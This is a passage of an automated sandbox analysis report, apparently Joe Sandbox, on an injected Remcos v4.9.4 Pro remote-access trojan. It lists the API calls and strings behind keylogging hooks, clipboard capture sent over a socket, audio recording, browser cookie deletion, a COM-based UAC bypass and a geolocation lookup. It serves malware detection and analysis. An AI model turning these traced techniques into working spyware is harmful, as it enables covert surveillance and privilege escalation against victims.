                                        • Part of subcall function 02A04B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0548B), ref: 02A04BC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: aac0a83d29c2706cbc3148276ca45450343139e9741b6c4907f75ad449201430
                                      • Instruction ID: df8ee0f47b2bfbd903e9b06e77c099dcea4161dad22ac084007e0f4fd670babc
                                      • Opcode Fuzzy Hash: aac0a83d29c2706cbc3148276ca45450343139e9741b6c4907f75ad449201430
                                      • Instruction Fuzzy Hash: 0A318B71488351AFC210EB20ED849DFB3A9FB94354F40491EB58A92180EF74AE08CB96
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02A0A2D3
                                      • SetWindowsHookExA.USER32(0000000D,02A0A2A4,00000000), ref: 02A0A2E1
                                      • GetLastError.KERNEL32 ref: 02A0A2ED
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02A0A33B
                                      • TranslateMessage.USER32(?), ref: 02A0A34A
                                      • DispatchMessageA.USER32(?), ref: 02A0A355
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 02A0A301
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: f639d259bcf0d319d40bc0b8876fde04165dff04019c5072b30b760076654174
                                      • Instruction ID: 955f9682b8d55fc950fd0e2bcde5fb0937f920c0b583d19b4be9787dde6b8323
                                      • Opcode Fuzzy Hash: f639d259bcf0d319d40bc0b8876fde04165dff04019c5072b30b760076654174
                                      • Instruction Fuzzy Hash: EA11E332984302EBDB107F75EC8986BB7ECEB95721B00496DF986C6080EF30C511CBA2
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,02A3EA24,02A3EA24,?,?,?,02A4AE9A,00000001,00000001,73E85006), ref: 02A4ACA3
                                      • __alloca_probe_16.LIBCMT ref: 02A4ACDB
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,02A4AE9A,00000001,00000001,73E85006,?,?,?), ref: 02A4AD29
                                      • __alloca_probe_16.LIBCMT ref: 02A4ADC0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02A4AE23
                                      • __freea.LIBCMT ref: 02A4AE30
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • __freea.LIBCMT ref: 02A4AE39
                                      • __freea.LIBCMT ref: 02A4AE5E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: a145510fa5156d03c227f98aadbaec00d8be0d5c675e8d0df10827475d48ef66
                                      • Instruction ID: 24c44003831909a74c6c26f1fcb59b43b859d63d456dd8d3a60d65031bc94202
                                      • Opcode Fuzzy Hash: a145510fa5156d03c227f98aadbaec00d8be0d5c675e8d0df10827475d48ef66
                                      • Instruction Fuzzy Hash: 9B51F372A80226AFDB258F64CD91FAB77AAEB84754F184628FC15D6181EF34DC41CB90
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 02A0A416
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 02A0A422
                                      • GetKeyboardLayout.USER32(00000000), ref: 02A0A429
                                      • GetKeyState.USER32(00000010), ref: 02A0A433
                                      • GetKeyboardState.USER32(?), ref: 02A0A43E
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02A0A461
                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02A0A4C1
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02A0A4FA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                      • String ID:
                                      • API String ID: 1888522110-0
                                      • Opcode ID: 0521566b3dff1a96116d296a2cd59a3de49db910c0740bc919da81a40fbe3ddd
                                      • Instruction ID: 65a7c50b42b6b2605ce13cd2a8acbd8bb95806c1b3fe3cda192d921da28e4999
                                      • Opcode Fuzzy Hash: 0521566b3dff1a96116d296a2cd59a3de49db910c0740bc919da81a40fbe3ddd
                                      • Instruction Fuzzy Hash: BA316E72584305FFD710DE94DC84F9BB7ECAB88714F00082AB645C7190EBB1E559CB92
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02A199CC
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A199ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A19A0D
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A19A21
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02A19A37
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02A19A54
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02A19A6F
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 02A19A8B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: e07bda24bd420e9400fcc795cd8cb0a6c3282a420e75b82e3338ba08044f59af
                                      • Instruction ID: 5d72b971d83512c5a43601f5df33ab258253a046825583850b76c861a9745539
                                      • Opcode Fuzzy Hash: e07bda24bd420e9400fcc795cd8cb0a6c3282a420e75b82e3338ba08044f59af
                                      • Instruction Fuzzy Hash: 013185715543196EE311CF51D981BEBBBDCDF88764F00080EF6809A1D1D7A295C98B97
                                      APIs
                                      • OpenClipboard.USER32 ref: 02A16941
                                      • EmptyClipboard.USER32 ref: 02A1694F
                                      • CloseClipboard.USER32 ref: 02A16955
                                      • OpenClipboard.USER32 ref: 02A1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02A1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02A16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02A1697E
                                      • CloseClipboard.USER32 ref: 02A16984
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID:
                                      • API String ID: 2172192267-0
                                      • Opcode ID: b9ec70c72e4f336103a6c15b4eedf7e7ffde0470d88745ebb6393ae5c60eaf99
                                      • Instruction ID: 03d8f321b3feec90707a336c9fb4f5a54862b5aca2143948ae011181f55dc23a
                                      • Opcode Fuzzy Hash: b9ec70c72e4f336103a6c15b4eedf7e7ffde0470d88745ebb6393ae5c60eaf99
                                      • Instruction Fuzzy Hash: 9F015E31A94322DFC714BB71ED8C6AF77AABF84761F400C9DE50A865C0DF24C816CAA1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 993a1bbf2571a620aa41d8406230ba8d47528632ed98ad72a3d82ace7e54cfd5
                                      • Instruction ID: cf7091dc09c8221b6eff22a042a41f21856da22ef6d8d5119a0c7b4d5f30ec45
                                      • Opcode Fuzzy Hash: 993a1bbf2571a620aa41d8406230ba8d47528632ed98ad72a3d82ace7e54cfd5
                                      • Instruction Fuzzy Hash: A561DD71D40215AFDB20CF68C881BABBBF5EB49724F15456AEE58EB241EF309D41CB90
                                      APIs
                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02A4BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02A4B3FE
                                      • __fassign.LIBCMT ref: 02A4B479
                                      • __fassign.LIBCMT ref: 02A4B494
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02A4B4BA
                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,02A4BB31,00000000,?,?,?,?,?,?,?,?,?,02A4BB31,?), ref: 02A4B4D9
                                      • WriteFile.KERNEL32(?,?,00000001,02A4BB31,00000000,?,?,?,?,?,?,?,?,?,02A4BB31,?), ref: 02A4B512
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 82facb4f25d0425c328e3594e45fdf646cebd4324c47ed9c048436975d6a0b7f
                                      • Instruction ID: 1ffa61c7a5812561dabf0a4eff3355f3ae8420f654c924eb0eb8ca51016164a8
                                      • Opcode Fuzzy Hash: 82facb4f25d0425c328e3594e45fdf646cebd4324c47ed9c048436975d6a0b7f
                                      • Instruction Fuzzy Hash: BC519070D00209AFCB10CFA8D885AEEBBF4EF48314F14495AE956E7281EF31D951CBA1
                                      APIs
                                      • _strftime.LIBCMT ref: 02A01D50
                                        • Part of subcall function 02A01A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02A01AD9
                                      • waveInUnprepareHeader.WINMM(02A72A88,00000020,00000000,?), ref: 02A01E02
                                      • waveInPrepareHeader.WINMM(02A72A88,00000020), ref: 02A01E40
                                      • waveInAddBuffer.WINMM(02A72A88,00000020), ref: 02A01E4F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav
                                      • API String ID: 3809562944-3597965672
                                      • Opcode ID: ae743aae5468ccc61e33d0b3397cb943d9654009429221acf107eea8da0a792e
                                      • Instruction ID: fea925a8c20d458ff28536de30413b98a5dc50764e573d839b0add629ccbc9ce
                                      • Opcode Fuzzy Hash: ae743aae5468ccc61e33d0b3397cb943d9654009429221acf107eea8da0a792e
                                      • Instruction Fuzzy Hash: 0B3152319843019FD325EB20ED95ADF77EAFB54311F40482AE58D821D0EF70991ACF96
                                      APIs
                                        • Part of subcall function 02A135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 02A135CA
                                        • Part of subcall function 02A135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 02A135E7
                                        • Part of subcall function 02A135A6: RegCloseKey.ADVAPI32(?), ref: 02A135F2
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 02A0BF6B
                                      • PathFileExistsA.SHLWAPI(?), ref: 02A0BF78
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: d371b84e4fa6010ae90b3a4afaf49d83c4e8bceb44317177a9130b464eb70dfa
                                      • Instruction ID: 276d3c7c054b68e93af2ba1c4f9fc107e150991579f925c9072af37e98f82c0e
                                      • Opcode Fuzzy Hash: d371b84e4fa6010ae90b3a4afaf49d83c4e8bceb44317177a9130b464eb70dfa
                                      • Instruction Fuzzy Hash: 5A218170AC0219AADB04FBB0EED9DFE776AAF10714F80045AD906671C0EF249949CFD1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1e78b19a4dd127bec2f45e1f9daebc610cbad6fceda36ee2c4ffc809eff1dac6
                                      • Instruction ID: 4105a1d0d077151f09cdb382f12755390bbfae7bdbf8be12327dbd17b0e3b7de
                                      • Opcode Fuzzy Hash: 1e78b19a4dd127bec2f45e1f9daebc610cbad6fceda36ee2c4ffc809eff1dac6
                                      • Instruction Fuzzy Hash: 7611DF72984225BADB202F768D44E6F7AAEEFC5B30B414619FD11CB250DE34C841CAB0
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02A1B3A7
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02A1B3BD
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02A1B3D6
                                      • InternetCloseHandle.WININET(00000000), ref: 02A1B41C
                                      • InternetCloseHandle.WININET(00000000), ref: 02A1B41F
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 02A1B3B7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 1e531496fad2964733157f56e5e924686452f397d7c9cd3b0cab08d3201cc0d7
                                      • Instruction ID: 8cc97063955c8486ae0a4a206817a987e039ad62dae9c0e8840f5f7b60a77bea
                                      • Opcode Fuzzy Hash: 1e531496fad2964733157f56e5e924686452f397d7c9cd3b0cab08d3201cc0d7
                                      • Instruction Fuzzy Hash: 7711C8315453226BD624AB25AC89EBF7FADEF85764F00082DF80592180DF64DC45C6F2
                                      APIs
                                        • Part of subcall function 02A50C41: _free.LIBCMT ref: 02A50C6A
                                      • _free.LIBCMT ref: 02A50F48
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A50F53
                                      • _free.LIBCMT ref: 02A50F5E
                                      • _free.LIBCMT ref: 02A50FB2
                                      • _free.LIBCMT ref: 02A50FBD
                                      • _free.LIBCMT ref: 02A50FC8
                                      • _free.LIBCMT ref: 02A50FD3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction ID: 1e3144d964a2386026c49c30526fc69e45767e0f0982ddf2a93f738d2e4548d3
                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                      • Instruction Fuzzy Hash: 0C1142715C0714EAD520BB70CE45FCB779EAF4A702F484815AEED66050DEB5F9085F50
                                      APIs
                                        • Part of subcall function 02A1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02A0DAAA,WinDir,00000000,00000000), ref: 02A1BFC8
                                        • Part of subcall function 02A135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 02A135CA
                                        • Part of subcall function 02A135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 02A135E7
                                        • Part of subcall function 02A135A6: RegCloseKey.ADVAPI32(?), ref: 02A135F2
                                      • StrToIntA.SHLWAPI(00000000,02A6C9F8,00000000,00000000,00000000,02A750E4,00000003,Exe,00000000,0000000E,00000000,02A660BC,00000003,00000000), ref: 02A1B33C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: f40520d51ba2b909d3dc7896a8d912a3a8f6fb7636ae03ac915f0a192e1759ae
                                      • Instruction ID: 4e5a02fc0c761992651db6c6ff580b141ee7e6cd2151f837e85996b286b61a25
                                      • Opcode Fuzzy Hash: f40520d51ba2b909d3dc7896a8d912a3a8f6fb7636ae03ac915f0a192e1759ae
                                      • Instruction Fuzzy Hash: 5E115961EC02006AE704B374DD9EEBF776F9B94734F840967D446A31C0EF549816CBA1
                                      APIs
                                      • GetLastError.KERNEL32(?,?,02A3A351,02A392BE), ref: 02A3A368
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02A3A376
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02A3A38F
                                      • SetLastError.KERNEL32(00000000,?,02A3A351,02A392BE), ref: 02A3A3E1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 77796cbaea0b3ceb66a74c68829bdb8ab254cfe55b79cf4433a48a198373e81a
                                      • Instruction ID: 0bec002cf51c6ee45c25e344678903f94fe60d794898ee9a84f5970cb2b0baf1
                                      • Opcode Fuzzy Hash: 77796cbaea0b3ceb66a74c68829bdb8ab254cfe55b79cf4433a48a198373e81a
                                      • Instruction Fuzzy Hash: FD01283658D3319E971726786CC5B6B26C9EB027B67300369F018550D0EF55CC169944
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\regsvr32.exe), ref: 02A075D0
                                        • Part of subcall function 02A074FD: _wcslen.LIBCMT ref: 02A07521
                                        • Part of subcall function 02A074FD: CoGetObject.OLE32(?,00000024,02A66518,00000000), ref: 02A07582
                                      • CoUninitialize.OLE32 ref: 02A07629
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: InitializeObjectUninitialize_wcslen
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                      • API String ID: 3851391207-1860703646
                                      • Opcode ID: 57c7393ae06a08063ae25639f0dd7869e7d1cd68a6c7ac5ba6fb677614bba50e
                                      • Instruction ID: 24b8bf0eb1cddb7f4176aac6b7c68732b07463779ccfb1585f7e86d48f4762cb
                                      • Opcode Fuzzy Hash: 57c7393ae06a08063ae25639f0dd7869e7d1cd68a6c7ac5ba6fb677614bba50e
                                      • Instruction Fuzzy Hash: 4701CC727402116BF2245BA4ED8EF7BE75CDB44B29F10041EF9028A082EFA1BC014AA1
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02A0BADD
                                      • GetLastError.KERNEL32 ref: 02A0BAE7
                                      Strings
                                      • UserProfile, xrefs: 02A0BAAD
                                      • [Chrome Cookies not found], xrefs: 02A0BB01
                                      • [Chrome Cookies found, cleared!], xrefs: 02A0BB0D
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02A0BAA8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 80d0d99273683f4f7d313e331343d5817109a416c7811f0dc7591ad5d29a46af
                                      • Instruction ID: 0e5449138cc858ab1b9a68c161cdc9c89580f695a9dce75fd87f224c13b65cd6
                                      • Opcode Fuzzy Hash: 80d0d99273683f4f7d313e331343d5817109a416c7811f0dc7591ad5d29a46af
                                      • Instruction Fuzzy Hash: A4012B31AC02096B97047BB9FFDA8FE773AE922714B400956D403521D4EE124955CAD2
                                      APIs
                                      • AllocConsole.KERNEL32(02A75338), ref: 02A1CDA4
                                      • ShowWindow.USER32(00000000,00000000), ref: 02A1CDBD
                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 02A1CDE2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: Console$AllocOutputShowWindow
                                      • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                      • API String ID: 2425139147-3065609815
                                      • Opcode ID: d2a0b4998164516770a8a6a4c96a682a9d53f647a358d320141c775f6cbe0a7b
                                      • Instruction ID: f2a3016c7dbadc1bb14df34e570f047b55510de261c50b0cd0ca46dffd7d440c
                                      • Opcode Fuzzy Hash: d2a0b4998164516770a8a6a4c96a682a9d53f647a358d320141c775f6cbe0a7b
                                      • Instruction Fuzzy Hash: 4C01D871DC03087BE600F7F09E4DF5E77AEAB04B10F5008177608A7081DFB4D5154AA5
                                      APIs
                                      • __allrem.LIBCMT ref: 02A3AC69
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A3AC85
                                      • __allrem.LIBCMT ref: 02A3AC9C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A3ACBA
                                      • __allrem.LIBCMT ref: 02A3ACD1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A3ACEF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction ID: ddc30c4f60fced2821870dfbd573b75d5ed2f634ed1e7455236b29ddb88c6355
                                      • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction Fuzzy Hash: 67812D72640B269FD7269F78CD80BABB3EAEF40364F24452AF591D7281EF74D9408B50
                                      APIs
                                        • Part of subcall function 02A1179C: SetLastError.KERNEL32(0000000D,02A11D1C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02A11CFA), ref: 02A117A2
                                      • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02A11CFA), ref: 02A11D37
                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02A11CFA), ref: 02A11DA5
                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 02A11DC9
                                        • Part of subcall function 02A11CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,02A11DE7,?,00000000,00003000,00000040,00000000,?,00000000), ref: 02A11CB3
                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 02A11E10
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 02A11E17
                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A11F2A
                                        • Part of subcall function 02A12077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02A11F37,?,?,?,?,00000000), ref: 02A120E7
                                        • Part of subcall function 02A12077: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 02A120EE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 3950776272-0
                                      • Opcode ID: 78ba21d54460be00161a7d873c32751d8aa22f6e5ab2e2aae22ca66bb0820ab0
                                      • Instruction ID: 8b373aeaa3f9d0877270a89f78c4f64cde2789b282aca5881c6c8d94cc1d060b
                                      • Opcode Fuzzy Hash: 78ba21d54460be00161a7d873c32751d8aa22f6e5ab2e2aae22ca66bb0820ab0
                                      • Instruction Fuzzy Hash: CF61FF70741311ABCB14AF65CA80B7B7BAAFF84360F04455AEA0D8B681EFB4D851CBD1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: c77f8ffb2564edde353501350d9b88a728aa9e8429e72a368f26cb05c3ea5ae7
                                      • Instruction ID: 76d9f81ee581a620c429125fc24eb8e47ef1e009b8e82f6982b72e8ff682f7aa
                                      • Opcode Fuzzy Hash: c77f8ffb2564edde353501350d9b88a728aa9e8429e72a368f26cb05c3ea5ae7
                                      • Instruction Fuzzy Hash: 6B512B32D40205AFDB249B69CDC4FAE77BAEFD9334F98422AE81596181DF31D504CAA4
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 02A0A740
